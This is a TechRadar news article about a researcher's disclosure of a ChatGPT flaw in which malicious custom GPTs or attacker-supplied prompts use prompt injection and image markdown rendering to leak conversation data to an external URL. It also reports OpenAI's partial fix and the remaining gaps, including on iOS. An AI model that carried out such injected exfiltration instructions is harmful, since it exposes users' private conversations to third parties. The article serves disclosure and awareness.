Get all your news in one place.
100’s of premium titles.
One app.
Start reading
TechRadar
TechRadar
Benedict Collins

OpenAI says it has fixed a potentially serious ChatGPT flaw - but there could still be problems

Data leak.

A researcher discovered a serious flaw in ChatGPT that allowed details from a conversation to be leaked to an external URL.

When Johann Rehberger attempted to alert OpenAI to the potential flaw, he received no response, forcing the researcher to disclose details of the flaw publicly.

Following the disclosure OpenAI released safety checks for ChatGPT that mitigate the flaw, but not completely.

 A hasty patch

The flaw in question allows malicious chatbots powered by ChatGPT to exfiltrate sensitive data, such as the content of the chat, alongside metadata and technical data.

A secondary method involves the victim submitting a prompt supplied by the attacker, which then uses image markdown rendering and prompt injecting to exfiltrate the data.

Rehberger initially reported the flaw to OpenAI way back in April 2023, supplying more details on how it can be used in more devious ways through November.

Rehberger stated that, "This GPT and underlying instructions were promptly reported to OpenAI on November, 13th 2023. However, the ticket was closed on November 15th as "Not Applicable". Two follow up inquiries remained unanswered. Hence it seems best to share this with the public to raise awareness."

Instead of further pursuing an apparently non-respondent OpenAI, Rehberger instead decided to go public with his discovery, releasing a video demonstration of how his entire conversation with a chatbot designed to play tic-tac-toe was extracted to a third-party URL.

To mitigate this flaw, ChatGPT now performs checks to prevent the secondary method mentioned above from taking place. Rehberger responded to this fix stating, “When the server returns an image tag with a hyperlink, there is now a ChatGPT client-side call to a validation API before deciding to display an image.”

Unfortunately, these new checks do not fully mitigate the flaw, as Rehberger discovered that arbitrary domains are still sometimes rendered by ChatGPT, but a successful return is hit and miss. While these checks have apparently been implemented on the desktop versions of ChatGPT, the flaw remains viable on the iOS mobile app.

Via BleepingComputer

More from TechRadar Pro

Sign up to read this article
Read news from 100’s of titles, curated specifically for you.
Already a member? Sign in here
Related Stories
Top stories on inkl right now
One subscription that gives you access to news from hundreds of sites
Already a member? Sign in here
Our Picks
Fourteen days free
Download the app
One app. One membership.
100+ trusted global sources.